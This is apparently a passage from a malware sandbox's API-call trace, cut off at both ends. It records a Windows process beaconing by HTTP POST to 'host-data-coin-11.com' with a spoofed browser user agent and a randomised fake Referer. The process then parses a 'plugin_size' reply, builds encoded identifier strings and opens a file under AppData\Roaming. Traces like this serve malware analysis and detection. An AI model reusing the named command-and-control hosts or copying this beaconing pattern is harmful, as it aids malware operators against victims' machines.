(HeapHandle=0x7f50000, Flags=0x8, Size=0x2800) returned 0x7f52810 [0129.474] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52810, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52810*, lpdwNumberOfBytesRead=0x6e6fd68*=0x18) returned 1 [0129.475] RtlReAllocateHeap (Heap=0x7f50000, Flags=0x8, Ptr=0x7f52810, Size=0x5000) returned 0x7f52810 [0129.476] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52828, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52828*, lpdwNumberOfBytesRead=0x6e6fd68*=0x0) returned 1 [0129.476] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0129.526] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52810) returned 1 [0129.526] WinHttpCloseHandle (hInternet=0x7149a30) returned 1 [0129.526] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f526f0) returned 0x10d [0129.527] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f526f0) returned 1 [0129.527] WinHttpCloseHandle (hInternet=0x3f83a90) returned 1 [0129.527] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52620) returned 0x68 [0129.527] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52620) returned 1 [0129.527] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52600) returned 0x12 [0129.527] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52600) returned 1 [0129.527] WinHttpCloseHandle (hInternet=0x3faf720) returned 1 [0129.527] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f524e0) returned 0x10c [0129.527] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f524e0) returned 1 [0129.527] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52350) returned 0x91 [0129.527] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52350) returned 1 [0129.527] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f523f0) returned 0xe0 [0129.528] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f523f0) returned 1 [0129.528] lstrlenA (lpString="ä\x071|:|plugin_size=0") returned 19 [0129.528] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x15) returned 0x7f52350 [0129.528] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0129.528] lstrlenA (lpString="plugin_size") returned 11 [0129.528] atoi (_Str="0") returned 0 [0129.528] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0129.528] lstrlenA (lpString="|:|") returned 3 [0129.528] MapViewOfFile (hFileMappingObject=0x1588, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2590000 [0129.536] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0129.536] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2590000) returned 0x0 [0129.559] atoi (_Str="1") returned 1 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4dc4f92b [0129.559] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x9b) returned 0x7f52370 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x381bd2a7 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x215e3644 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2ea91ef3 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2ca63ec [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7ebe57fc [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3ac90b08 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x68e7602c [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1756ea2e [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4b9cab1e [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x453c5b9 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x35ef0c20 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7d56fc0 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b0f422d [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22ef8238 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x30a2d187 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1afc8b07 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7442276d [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x76140611 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1d9b98c1 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x15176f43 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x762fd7e6 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1a493151 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x45a2d0b [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x67ce679e [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x279ff91c [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5951e4f2 [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5bd1323a [0129.559] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x76e56726 [0129.560] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d943231 [0129.560] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b947844 [0129.560] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x31cb8b8d [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22105f3 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x54b1ac98 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3369fe6 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x920a914 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x103e6127 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x540ed0c3 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50da4440 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7b4b7665 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c763e17 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x30b01e54 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a569140 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x295601c7 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7736fbee [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50ff2e44 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3a88c45b [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4a102ad8 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x569e5e49 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4adcfc89 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78d1c611 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x32979281 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7e256ebf [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x36c07bc6 [0129.599] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x28f8bb00 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x20ebf515 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x70734bd7 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4369bb13 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x68cb59a9 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x61a37d02 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xe7bcebe [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5a699b1 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x383de6b3 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x17c03a3f [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x139dddd5 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7fcc0ac [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3861bdb4 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x701fe47e [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x9a5e8a7 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7be2a845 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6fa853b0 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xf49bbf4 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6febc258 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x44a26ec2 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x262a1d54 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b54829c [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x559f129a [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x40f1af91 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ead3d1 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x346399dc [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b8f58be [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4b0594e5 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x547be752 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d341884 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2eb18a9b [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x558fda31 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x26da880e [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x53696a95 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1c8c2480 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4b044f44 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xba5c726 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a06422a [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xb81dd08 [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xff3e6cc [0129.600] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2f68c445 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x27cc45b3 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x224f120a [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d1e592 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x14038af9 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x60d9c569 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x24c6cc82 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x56c7751 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x59ca2ee [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x105bc239 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x374d8c2e [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x275edc49 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4d1c3f60 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6cd0c899 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x559fe66f [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6f8f8aec [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xc6413d6 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x15e0e5c5 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x321c18c1 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3871f548 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3531257c [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d538fbc [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x76d1c163 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1be3ddc0 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4c64ab42 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6e9d1f39 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78ed588a [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2787e423 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x61249b06 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x15a0c3a6 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4628c197 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x346add9a [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5835e885 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57407b68 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x173ddb7f [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x685d348f [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7896a412 [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4d4d22ac [0129.601] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5f26b4a [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2e57ff16 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5f77a24a [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1d473ed9 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x9fa6840 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b755759 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d47068d [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6f892508 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x507c6ae8 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x71bfdb72 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d9c3478 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3becd777 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x49969682 [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x289ddf1f [0129.602] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3dd01031 [0129.602] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xea) returned 0x7f52420 [0129.602] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0129.602] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0129.602] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0129.602] lstrcatA (in: lpString1="", lpString2="XuV/Ieg/i4'=V9>R0,p`cj;LSgVlk\\\"W6UqZU0SWy!!HLf2r=N,2byNJ]N7^H0J!#9%9VW=@W!V/HF5Ae2*2@g>W3iArsEc171mj5" | out: lpString1="ys'rP#^ls7zE&@6p@wj@s3w2@DKO::z!]+OUUKjE^]'&:@^\"sG_@x'hVU.Iml\"EggEO\"#9/x>`cj;LSgVlk\\\"W6UqZU0SWy!!HLf2r=N,2byNJ]N7^H0J!#9%9VW=@W!V/HF5Ae2*2@g>W3iArsEc171mj5") returned="ys'rP#^ls7zE&@6p@wj@s3w2@DKO::z!]+OUUKjE^]'&:@^\"sG_@x'hVU.Iml\"EggEO\"#9/x>`cj;LSgVlk\\\"W6UqZU0SWy!!HLf2r=N,2byNJ]N7^H0J!#9%9VW=@W!V/HF5Ae2*2@g>W3iArsEc171mj5" [0187.461] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10c) returned 0x7f52540 [0187.461] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0187.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f52300, cbMultiByte=30, lpWideCharStr=0x7f52540, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0187.462] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x6e6fbf8 | out: pProxyConfig=0x6e6fbf8) returned 1 [0187.484] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3faf720 [0187.485] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x6e6fcb0 | out: lpUrlComponents=0x6e6fcb0) returned 1 [0187.486] WinHttpConnect (hSession=0x3faf720, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83a90 [0187.486] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52660 [0187.486] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x68) returned 0x7f52680 [0187.486] WinHttpOpenRequest (hConnect=0x3f83a90, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x7149a30 [0187.487] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x4e) returned 0x7f526f0 [0187.487] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f52750 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ee666c7 [0187.487] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52870 [0187.487] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x17) returned 0x7f52890 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1fe78bc0 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2df3aa67 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x66b00915 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x171c32e1 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x77911d0d [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x16faf71c [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23abc089 [0187.487] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xf2a4d14 [0187.487] wsprintfW (in: param_1=0x7f52750, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://qsblmfj.com/") returned 41 [0187.487] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52890) returned 0x17 [0187.487] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52890) returned 1 [0187.487] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52870) returned 0x12 [0187.487] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52870) returned 1 [0187.487] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f526f0) returned 0x4e [0187.488] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f526f0) returned 1 [0187.488] WinHttpAddRequestHeaders (hRequest=0x7149a30, pwszHeaders="Accept: */*\r\nReferer: http://qsblmfj.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0187.488] WinHttpSendRequest (hRequest=0x7149a30, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f52440*, dwOptionalLength=0xea, dwTotalLength=0xea, dwContext=0x0) returned 1 [0187.664] WinHttpReceiveResponse (hRequest=0x7149a30, lpReserved=0x0) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x2800) returned 0x7f52870 [0187.665] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52870, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52870*, lpdwNumberOfBytesRead=0x6e6fd68*=0x18) returned 1 [0187.666] RtlReAllocateHeap (Heap=0x7f50000, Flags=0x8, Ptr=0x7f52870, Size=0x5000) returned 0x7f52870 [0187.667] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52888, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52888*, lpdwNumberOfBytesRead=0x6e6fd68*=0x0) returned 1 [0187.667] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x25a0000 [0187.669] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52870) returned 1 [0187.669] WinHttpCloseHandle (hInternet=0x7149a30) returned 1 [0187.669] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52750) returned 0x10d [0187.669] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52750) returned 1 [0187.670] WinHttpCloseHandle (hInternet=0x3f83a90) returned 1 [0187.670] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52680) returned 0x68 [0187.670] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52680) returned 1 [0187.670] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52660) returned 0x12 [0187.670] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52660) returned 1 [0187.670] WinHttpCloseHandle (hInternet=0x3faf720) returned 1 [0187.670] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52540) returned 0x10c [0187.671] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52540) returned 1 [0187.671] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52390) returned 0xa4 [0187.671] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52390) returned 1 [0187.671] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52440) returned 0xf3 [0187.672] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52440) returned 1 [0187.672] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0187.672] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x15) returned 0x7f52390 [0187.672] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0187.672] lstrlenA (lpString="plugin_size") returned 11 [0187.672] atoi (_Str="0") returned 0 [0187.672] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0187.672] lstrlenA (lpString="|:|") returned 3 [0187.672] MapViewOfFile (hFileMappingObject=0x1588, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x25b0000 [0187.682] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0187.682] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x25b0000) returned 0x0 [0187.730] atoi (_Str="0") returned 0 [0187.730] VirtualFree (lpAddress=0x25a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.731] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x26 [0187.731] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0187.731] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 